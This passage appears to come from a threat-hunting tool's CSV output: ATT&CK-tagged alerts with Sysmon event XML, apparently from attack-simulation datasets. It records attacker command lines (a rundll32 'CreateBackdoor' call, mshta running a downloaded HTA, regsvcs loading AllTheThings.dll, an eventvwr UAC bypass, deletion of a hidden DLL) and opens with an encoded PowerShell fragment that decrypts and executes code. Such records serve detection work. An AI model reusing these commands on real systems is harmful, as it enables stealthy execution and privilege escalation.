HIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
</TimeCreated>
<EventRecordID>243540</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
<Data Name=""ProcessId"">1828</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:06.562199Z"">
</TimeCreated>
<EventRecordID>16794</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:04.463</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49165</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">104.20.208.21</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
</TimeCreated>
<EventRecordID>243540</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
<Data Name=""ProcessId"">1828</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
</TimeCreated>
<EventRecordID>7648</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
<Data Name=""ParentProcessId"">3660</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&amp;&amp;del del /F /Q /A:H &quot;C:\Users\IEUser\AppData\Roaming\wwlib.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:49.229742Z"">
</TimeCreated>
<EventRecordID>417085</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:49.217</Data>
<Data Name=""ProcessGuid"">747F3D96-D8F5-5F8A-0000-00106B6F7300</Data>
<Data Name=""ProcessId"">1680</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd /c ping 127.0.0.1&amp;&amp;del del /F /Q /A:H &quot;C:\Users\IEUser\AppData\Roaming\wwlib.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:28.250664Z"">
</TimeCreated>
<EventRecordID>4916</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.197</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-001067768800</Data>
<Data Name=""ProcessId"">1296</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
</TimeCreated>
<EventRecordID>243540</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
<Data Name=""ProcessId"">1828</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
</TimeCreated>
<EventRecordID>7648</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
<Data Name=""ParentProcessId"">3660</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( &quot;C:\Windows\system32\mmc.exe&quot; &quot;C:\Windows\system32\eventvwr.msc&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:57:04.681038Z"">
</TimeCreated>
<EventRecordID>15</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1088,technique_name=Bypass User Account Control</Data>
<Data Name=""UtcTime"">2019-04-18 16:57:04.500</Data>
<Data Name=""ProcessGuid"">365ABB72-AC60-5CB8-0000-001037BA0800</Data>
<Data Name=""ProcessId"">3900</Data>
<Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft Management Console</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\mmc.exe&quot; &quot;C:\Windows\system32\eventvwr.msc&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC60-5CB8-0000-001002B30800</Data>
<Data Name=""ParentProcessId"">3904</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
</TimeCreated>
<EventRecordID>7648</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
